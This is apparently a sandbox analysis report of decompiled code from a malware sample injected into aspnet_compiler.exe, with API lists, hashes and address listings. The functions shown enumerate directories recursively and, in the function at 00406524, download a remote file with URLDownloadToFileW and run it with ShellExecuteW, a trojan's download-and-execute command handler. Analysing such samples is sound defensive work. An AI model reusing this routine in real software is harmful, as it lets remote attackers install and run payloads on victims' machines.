				intOrPtr* _t77;
				intOrPtr* _t79;
				signed int _t89;
				signed int _t94;
				intOrPtr* _t98;
				void* _t115;
				signed int _t123;
				signed int _t125;
				void* _t142;
				signed int _t143;
				intOrPtr _t146;
				char* _t209;
				void* _t213;
				void* _t217;
				void* _t219;
				intOrPtr _t220;
				void* _t221;
				void* _t223;

				_t146 = __ecx;
				E00456328(E0045670D, _t217);
				_t220 = _t219 - 0x308;
				_push(_t142);
				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
				E004020BF(_t142, _t217 - 0x5c);
				_t77 = E004022E5(_t217 + 0x20, _t217 - 0x1c);
				_t79 = E004022AA(_t217 + 0x20, _t217 - 0x20);
				E00409291(_t217 - 0x28,  *((intOrPtr*)(E004022E5(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
				_t221 = _t220 + 0xc;
				_t202 = _t217 + 8;
				_t213 = FindFirstFileW(E00401EE4(E004087F0(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
				 *(_t217 - 0x1c) = _t213;
				E00401EE9();
				if(_t213 != 0xffffffff) {
					_t143 = 0;
					__eflags = 0;
					while(1) {
						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
						__eflags = _t89;
						if(_t89 == 0) {
							break;
						}
						_t209 =  *((intOrPtr*)(_t217 - 0x18));
						__eflags =  *_t209;
						if( *_t209 == 0) {
							__eflags =  *(_t217 - 0x30c) & 0x00000010;
							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
								_t123 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, 0x4644f0);
								__eflags = _t123;
								if(_t123 != 0) {
									_t125 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
									_pop(_t170);
									__eflags = _t125;
									if(__eflags != 0) {
										_t202 = E00408876(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040415E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
										E004092BB(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
										E00401EE9();
										E00401EE9();
										_t223 = _t221 - 0x18;
										E004086D0(_t143, _t223, _t128, __eflags, _t217 + 0x20);
										_t221 = _t223 - 0x18;
										E004086D0(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
										E00408D1B(_t209, _t202, __eflags);
										E00401EE9();
									}
								}
							}
							E0040415E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
							_t98 = E004022E5(_t217 - 0x40, _t217 - 0x28);
							_t215 = E004022AA(_t217 - 0x40, _t217 - 0x24);
							E00409291(_t217 - 0x44,  *((intOrPtr*)(E004022E5(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
							_t221 = _t221 + 0xc;
							__eflags = E00409114(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
							if(__eflags == 0) {
								L15:
								E00401EE9();
								_t213 =  *(_t217 - 0x1c);
								continue;
							} else {
								E00401FC2(_t217 - 0x5c, _t202, _t215, E00402097(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
								E00401FB8();
								 *(_t217 - 4) = _t143;
								_t221 = _t221 - 0x18;
								_t202 = E00402EF0(_t143, _t217 - 0x74, E0041A879(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x472ec8);
								E00402EF0(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
								_push(0x66);
								_t115 = E00404A81( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
								__eflags = _t115 - 0xffffffff;
								E00401FB8();
								E00401FB8();
								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
									_t143 = 0;
									__eflags = 0;
									goto L15;
								}
								E00401EE9();
								E00401FB8();
								E00401EE9();
								E00401EE9();
								_t94 = 0;
								goto L17;
							}
						}
						FindClose(_t213);
						goto L6;
					}
					FindClose(_t213);
					E00401FB8();
					E00401EE9();
					E00401EE9();
					_t94 = 1;
					goto L17;
				} else {
					_t143 = 1;
					L6:
					E00401FB8();
					E00401EE9();
					E00401EE9();
					_t94 = _t143;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
					return _t94;
				}
			}
























                0x00408d1b
                0x00408d20
                0x00408d25
                0x00408d2b
                0x00408d2e
                0x00408d31
                0x00408d37
                0x00408d43
                0x00408d51
                0x00408d6d
                0x00408d72
                0x00408d81
                0x00408d9e
                0x00408da0
                0x00408da9
                0x00408db1
                0x00408db7
                0x00408db7
                0x00408db9
                0x00408dc1
                0x00408dc7
                0x00408dc9
                0x00000000
                0x00000000
                0x00408dcf
                0x00408dd2
                0x00408dd5
                0x00408dfd
                0x00408e04
                0x00408e16
                0x00408e1d
                0x00408e1f
                0x00408e31
                0x00408e37
                0x00408e38
                0x00408e3a
                0x00408e5c
                0x00408e64
                0x00408e70
                0x00408e78
                0x00408e7d
                0x00408e86
                0x00408e8b
                0x00408e97
                0x00408e9e
                0x00408ea9
                0x00408ea9
                0x00408e3a
                0x00408e1f
                0x00408eb8
                0x00408ec4
                0x00408ed7
                0x00408eee
                0x00408ef3
                0x00408f03
                0x00408f06
                0x00408fbf
                0x00408fc2
                0x00408fc7
                0x00000000
                0x00408f0c
                0x00408f24
                0x00408f2c
                0x00408f31
                0x00408f34
                0x00408f5b
                0x00408f5f
                0x00408f65
                0x00408f6d
                0x00408f72
                0x00408f7b
                0x00408f86
                0x00408f8b
                0x00408f8d
                0x00408fb9
                0x00408fbd
                0x00408fbd
                0x00000000
                0x00408fbd
                0x00408f92
                0x00408f9a
                0x00408fa2
                0x00408faa
                0x00408faf
                0x00000000
                0x00408faf
                0x00408f06
                0x00408dd8
                0x00000000
                0x00408dd8
                0x00408fd0
                0x00408fd9
                0x00408fe1
                0x00408fe9
                0x00408fee
                0x00000000
                0x00408db3
                0x00408db3
                0x00408dde
                0x00408de1
                0x00408de9
                0x00408df1
                0x00408df6
                0x00408ff0
                0x00408ff3
                0x00409000
                0x00409000

                APIs
                • __EH_prolog.LIBCMT ref: 00408D20
                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00408D98
                • FindNextFileW.KERNEL32(00000000,?), ref: 00408DC1
                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408DD8
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseFirstH_prologNext
                • String ID:
                • API String ID: 1157919129-0
                • Opcode ID: f23d2dba560608779638d8cfa0483366f34582b47cfd6e1a8bf63ed30e0f74ab
                • Instruction ID: b34c8ff471b712c414ce627f555fa5c2b30a51ca04011b772a5ffd3e96ebdc4c
                • Opcode Fuzzy Hash: f23d2dba560608779638d8cfa0483366f34582b47cfd6e1a8bf63ed30e0f74ab
                • Instruction Fuzzy Hash: 7D8153328001099BCB15EBA1DD969EE77B8AF54308F10417FE446B71E2EF385B49CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407E80 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00407E80(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t62;
				void* _t78;
				void* _t88;
				void* _t89;
				void* _t97;
				void* _t99;
				void* _t111;
				void* _t114;
				void* _t118;
				void* _t120;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t172;
				void* _t174;
				intOrPtr _t175;
				void* _t176;
				void* _t177;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;

				_t165 = __edx;
				_t120 = __ecx;
				E00456328(E004566F9, _t172);
				_t175 = _t174 - 0x2b0;
				_push(_t169);
				_push(_t167);
				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
				_t118 = _t120;
				E004020BF(_t118, _t172 - 0x4c);
				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
				if(_t118 != 0) {
					_t165 = 0x46a8f0;
					_t111 = E00406E3A(0x46a8f0);
					_t188 = _t111;
					if(_t111 != 0) {
						_t185 = _t175 - 0x18;
						E004086D0(_t118, _t185, 0x46a8f0, _t188, _t172 + 8);
						_t114 = E00419F8D(_t118, _t172 - 0x34, 0x46a8f0, _t172);
						_t175 = _t185 + 0x18;
						E00401EF3(_t172 + 0x20, _t165, _t169, _t114);
						E00401EE9();
					}
				}
				_t176 = _t175 - 0x18;
				E004086D0(_t118, _t176, _t165, _t188, _t172 + 8);
				_t62 = E00419FC8(_t118, _t172 - 0x34, _t165, _t172);
				_t177 = _t176 + 0x18;
				E0040323D(_t62);
				E00401EE9();
				L004086C6(_t118, _t172 + 8, _t167, _t172, "\\");
				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
				_t166 = _t172 + 8;
				_t170 = FindFirstFileW(E00401EE4(E004087F0(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
				 *(_t172 - 0x18) = _t170;
				E00401EE9();
				if(_t170 == 0xffffffff) {
					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
					E004379F6(_t172 - 0x1c, 0x46ccd0);
				}
				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
					if( *0x470b18 != 0) {
						E00401FB8();
						E00401EE9();
						E00401EE9();
						E00401FB8();
						_t78 = 0;
						__eflags = 0;
						L15:
						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
						return _t78;
					}
					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
						_t179 = _t177 - 0x18;
						E004020D6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
						_t180 = _t179 - 0x18;
						E004086D0(_t118, _t180, _t166, __eflags, _t172 + 0x20);
						_t88 = E0040415E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
						_t166 = _t172 + 8;
						_t89 = E00408876(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
						_t181 = _t180 - 0x14;
						E00403242(_t118, _t181, _t172, __eflags, _t89);
						E004080F9(_t118, _t172 + 8, _t167);
						_t177 = _t181 + 0x48;
						E00401EE9();
						L11:
						E00401EE9();
						continue;
					}
					if(E0043E224(_t172 - 0x288, _t172 - 0x288, 0x4644f0) == 0) {
						continue;
					}
					_t97 = E0043E224(_t172 - 0x288, _t172 - 0x288, L"..");
					_t194 = _t97;
					if(_t97 == 0) {
						continue;
					}
					_t99 = E0040415E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
					_t166 = _t172 + 8;
					E00408876(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
					E00401EE9();
					_t182 = _t177 - 0x18;
					E004020D6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
					_t183 = _t182 - 0x18;
					E004086D0(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
					_t184 = _t183 - 0x18;
					E004086D0(_t118, _t184, _t166, _t194, _t172 - 0x34);
					E00407E80(_t118, _t166, _t194);
					_t177 = _t184 + 0x48;
					goto L11;
				}
				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
				FindClose(_t170);
				E00401FB8();
				E00401EE9();
				E00401EE9();
				E00401FB8();
				_t78 = 1;
				goto L15;
			}































                0x00407e80
                0x00407e80
                0x00407e85
                0x00407e8a
                0x00407e91
                0x00407e92
                0x00407e93
                0x00407e96
                0x00407e9b
                0x00407ea0
                0x00407ea6
                0x00407ea8
                0x00407eb0
                0x00407eb5
                0x00407eb7
                0x00407eb9
                0x00407ec2
                0x00407eca
                0x00407ecf
                0x00407ed6
                0x00407ede
                0x00407ede
                0x00407eb7
                0x00407ee3
                0x00407eec
                0x00407ef4
                0x00407ef9
                0x00407f00
                0x00407f08
                0x00407f15
                0x00407f1a
                0x00407f2a
                0x00407f44
                0x00407f46
                0x00407f4c
                0x00407f54
                0x00407f56
                0x00407f66
                0x00407f66
                0x00407f6b
                0x00407f88
                0x004080c9
                0x004080d1
                0x004080d9
                0x004080e1
                0x004080e6
                0x004080e6
                0x004080e8
                0x004080eb
                0x004080f8
                0x004080f8
                0x00407f95
                0x0040802e
                0x00408037
                0x0040803c
                0x00408045
                0x00408054
                0x0040805a
                0x00408060
                0x00408065
                0x0040806b
                0x00408072
                0x00408077
                0x0040807d
                0x00408021
                0x00408024
                0x00000000
                0x00408024
                0x00407fb0
                0x00000000
                0x00000000
                0x00407fbe
                0x00407fc5
                0x00407fc7
                0x00000000
                0x00000000
                0x00407fd3
                0x00407fd9
                0x00407fdf
                0x00407fe8
                0x00407fed
                0x00407ff6
                0x00407ffb
                0x00408004
                0x00408009
                0x00408012
                0x00408019
                0x0040801e
                0x00000000
                0x0040801e
                0x00408084
                0x00408089
                0x00408092
                0x0040809a
                0x004080a2
                0x004080aa
                0x004080af
                0x00000000

                APIs
                • __EH_prolog.LIBCMT ref: 00407E85
                • FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408089
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                • String ID:
                • API String ID: 1771804793-0
                • Opcode ID: e51d4c18494591f064c9bea405c32cc60c670d4d3fb32e29913aff5c4e95ec4d
                • Instruction ID: eb919791392cef61e63247088396cac0e0337327006fc65e235cea095d5a35b6
                • Opcode Fuzzy Hash: e51d4c18494591f064c9bea405c32cc60c670d4d3fb32e29913aff5c4e95ec4d
                • Instruction Fuzzy Hash: 2F51517190020996CB04FBA1DD969DD77A8AF50308F50457FF846B31E2EF389B49CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406524 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00406524(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t63;
				void* _t70;
				void* _t72;
				void* _t77;
				intOrPtr* _t79;
				short* _t83;
				void* _t84;
				void* _t85;
				void* _t87;
				void* _t105;
				void* _t119;
				void* _t143;
				void* _t147;
				void* _t154;
				signed int _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t166;

				_t166 = __eflags;
				_t138 = __edx;
				_t33 = E00401F8B( &_a8);
				_push(0xffffffff);
				_t87 = 4;
				_push(_t87);
				_push( &_v28);
				E00404182( &_a8);
				_t158 = (_t155 & 0xfffffff8) - 0x2c;
				E004020D6(_t87, _t158, __edx, _t166, 0x472ec8);
				_t159 = _t158 - 0x18;
				E004020D6(_t87, _t159, __edx, _t166,  &_v44);
				E0041A976( &_v84, __edx);
				_t160 = _t159 + 0x30;
				_t147 =  *_t33 - _t87;
				if(_t147 == 0) {
					_t143 = 0;
					E00401E45( &_v64, __edx, _t154, __eflags, 0);
					__eflags = E00405AE5("F");
					if(__eflags == 0) {
						E00401E45( &_v68, "F", _t154, __eflags, 0);
						_t138 = "M";
						__eflags = E00405AE5("M");
						if(__eflags == 0) {
							L23:
							E00401E6D( &_v64, _t138);
							E00401FB8();
							E00401FB8();
							return 0;
						}
						_v68 = 0;
						_t50 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
						_t138 =  &_v76;
						__eflags = E0041A551(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t105 = _t160 - 0x18;
							_push("2");
							L22:
							E00402073(_t87, _t105, _t138, _t154);
							_push(0xb3);
							E00404A81(_a4, _t138, __eflags);
							goto L23;
						}
						_t138 = _v72;
						_t54 = E00417456(0x470b38);
						L0043A61B(_v72);
						_t162 = _t160 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t105 = _t162;
						if(__eflags != 0) {
							_push("3");
						} else {
							_push("1");
						}
						goto L22;
					}
					_t57 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 2));
					_t59 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 3));
					_t138 =  *_t57;
					E0040CF38( &_v60,  *_t57, _t59);
					_t63 = E00401F8B(E00401E45( &_v72,  *_t57, _t154, __eflags, _t87));
					__imp__URLDownloadToFileW(0, _t63, E00401EE4( &_v60), 0, 0);
					__eflags = _t63;
					if(__eflags == 0) {
						L4:
						if( *((char*)(E00401F8B(E00401E45( &_v84, _t138, _t154, _t170, 1)))) == 0) {
							_t119 = _t160 - 0x18;
							_push("0");
						} else {
							_t70 = ShellExecuteW(_t143, L"open", E00401EE4( &_v72), _t143, _t143, 1);
							_t119 = _t160 - 0x18;
							_t172 = _t70 - 0x20;
							if(_t70 > 0x20) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L17:
						E00402073(_t87, _t119, _t138, _t154);
						_push(0xb3);
						E00404A81(_a4, _t138, _t172);
						E00401EE9();
						goto L23;
					}
					L14:
					_t119 = _t160 - 0x18;
					_push("2");
					goto L17;
				}
				_t168 = _t147 != 1;
				if(_t147 != 1) {
					goto L23;
				}
				_t143 = 0;
				E00401E45( &_v64, __edx, _t154, _t168, 0);
				_t72 = E00405AE5("F");
				_t169 = _t72;
				if(_t72 == 0) {
					E00401E45( &_v68, "F", _t154, __eflags, 0);
					_t138 = "M";
					__eflags = E00405AE5("M");
					if(__eflags == 0) {
						goto L23;
					} else {
						_t138 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
						_t77 = E00417456(0x470b38);
						_t162 = _t160 - 0x18;
						__eflags = _t77 - 1;
						goto L9;
					}
				}
				_t79 = E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 2));
				E0040CF38( &_v60,  *_t79, E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 3)));
				_t83 = E00401EE4( &_v60);
				_t84 = E00401E45( &_v72,  *_t79, _t154, _t169, _t87);
				_t138 = _t83;
				_t85 = E0041AE6B(_t84, _t83);
				_t170 = _t85 - 1;
				if(_t85 != 1) {
					goto L14;
				}
				goto L4;
			}







































                0x00406524
                0x00406524
                0x00406533
                0x00406538
                0x0040653c
                0x00406542
                0x00406547
                0x00406548
                0x0040654d
                0x00406557
                0x0040655c
                0x00406566
                0x0040656f
                0x00406574
                0x00406577
                0x00406579
                0x004066a2
                0x004066a9
                0x004066be
                0x004066c0
                0x00406760
                0x00406765
                0x00406771
                0x00406773
                0x004067e1
                0x004067e5
                0x004067ee
                0x004067f6
                0x00406803
                0x00406803
                0x00406779
                0x0040678a
                0x0040678f
                0x0040679b
                0x0040679d
                0x004067c8
                0x004067ca
                0x004067cf
                0x004067cf
                0x004067d7
                0x004067dc
                0x00000000
                0x004067dc
                0x0040679f
                0x004067a8
                0x004067b4
                0x004067ba
                0x004067bd
                0x0040668a
                0x0040668a
                0x0040668c
                0x00406698
                0x0040668e
                0x0040668e
                0x0040668e
                0x00000000
                0x0040668c
                0x004066cf
                0x004066e3
                0x004066e8
                0x004066ef
                0x0040670d
                0x00406714
                0x0040671a
                0x0040671c
                0x00406601
                0x00406616
                0x00406738
                0x0040673a
                0x0040661c
                0x00406630
                0x00406639
                0x0040663b
                0x0040663e
                0x0040672e
                0x00406644
                0x00406644
                0x00406644
                0x0040663e
                0x0040673f
                0x0040673f
                0x00406747
                0x0040674c
                0x00406755
                0x00000000
                0x00406755
                0x00406722
                0x00406725
                0x00406727
                0x00000000
                0x00406727
                0x0040657f
                0x00406582
                0x00000000
                0x00000000
                0x00406588
                0x0040658f
                0x0040659b
                0x004065a4
                0x004065a6
                0x0040664f
                0x00406654
                0x00406660
                0x00406662
                0x00000000
                0x00406668
                0x00406679
                0x00406680
                0x00406685
                0x00406688
                0x00000000
                0x00406688
                0x00406662
                0x004065b5
                0x004065d5
                0x004065df
                0x004065eb
                0x004065f0
                0x004065f4
                0x004065f9
                0x004065fb
                0x00000000
                0x00000000
                0x00000000

                APIs
                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406630
                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406714
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DownloadExecuteFileShell
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                • API String ID: 2825088817-4294605632
                • Opcode ID: 4dec0716b2cfecefea45f77979f3a6200dc2f4bfe7f5c564d0eb37a83632f986
                • Instruction ID: 0db7feb28fe899170bc1ff05edd6f0e9b1c7309e9c1e85d08ff0b0aee6ae3b0b
                • Opcode Fuzzy Hash: 4dec0716b2cfecefea45f77979f3a6200dc2f4bfe7f5c564d0eb37a83632f986
                • Instruction Fuzzy Hash: 2C61E531A0430157CA14FB75C8A69BE77A99FD1308F10093FF942771D2EE3D8919869B
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00450943 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00450943(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x46f00c; // 0xd60a1515
				_v8 = _t50 ^ _t133;
				_t92 = E00446A95(__ebx, __ecx, __edx);
				_t129 =  *(E00446A95(_t92, __ecx, __edx) + 0x34c);
				_t132 = E00450C6B(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return E004338BB(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = E00450DC3(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = E00450DC3(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = E00450D9F(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = E0044008E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}


































                0x0045094e
                0x00450955
                0x00450963
                0x0045096b
                0x0045097a
                0x00450986
                0x0045099f
                0x004509b6
                0x004509bb
                0x004509c4
                0x004509c6
                0x00450a79
                0x00450a82
                0x00450a84
                0x00450b76
                0x00450b7d
                0x00450b80
                0x00450b90
                0x00450b90
                0x00450a97
                0x00450aa8
                0x00450aae
                0x00450ab0
                0x00450ac3
                0x00450aca
                0x00450acc
                0x00450b38
                0x00450b3b
                0x00000000
                0x00000000
                0x00450b3d
                0x00450b40
                0x00000000
                0x00000000
                0x00450b4c
                0x00450b53
                0x00450b55
                0x00000000
                0x00000000
                0x00450b57
                0x00450b5c
                0x00450b64
                0x00450b66
                0x00000000
                0x00000000
                0x00450b68
                0x00450b6e
                0x00450b71
                0x00450b71
                0x00450b73
                0x00450b73
                0x00000000
                0x00450b71
                0x00450ace
                0x00450ad4
                0x00450ad6
                0x00450ad9
                0x00450aeb
                0x00450aee
                0x00000000
                0x00000000
                0x00450af0
                0x00450af6
                0x00450afc
                0x00450afc
                0x00450aff
                0x00450b02
                0x00450b02
                0x00450b13
                0x00450b16
                0x00450b32
                0x00000000
                0x00450b32
                0x00450b18
                0x00450b1c
                0x00450b24
                0x00450b26
                0x00000000
                0x00000000
                0x00450b28
                0x00450b2e
                0x00450ae3
                0x00450ae3
                0x00000000
                0x00450ae3
                0x00450adb
                0x00450adb
                0x00450adb
                0x00450ae1
                0x00000000
                0x00450ae1
                0x00450ab2
                0x004509a4
                0x00000000
                0x004509a6
                0x004509da
                0x004509e8
                0x004509ee
                0x004509f0
                0x00000000
                0x00000000
                0x004509fc
                0x00450a02
                0x00450a03
                0x00450a05
                0x00450a12
                0x00450a15
                0x00000000
                0x00000000
                0x00450a17
                0x00450a1b
                0x00450a5f
                0x00450a5f
                0x00450a61
                0x00450a64
                0x00000000
                0x00000000
                0x00450a67
                0x00450a6d
                0x00450a6f
                0x00000000
                0x00000000
                0x00450a71
                0x00450a71
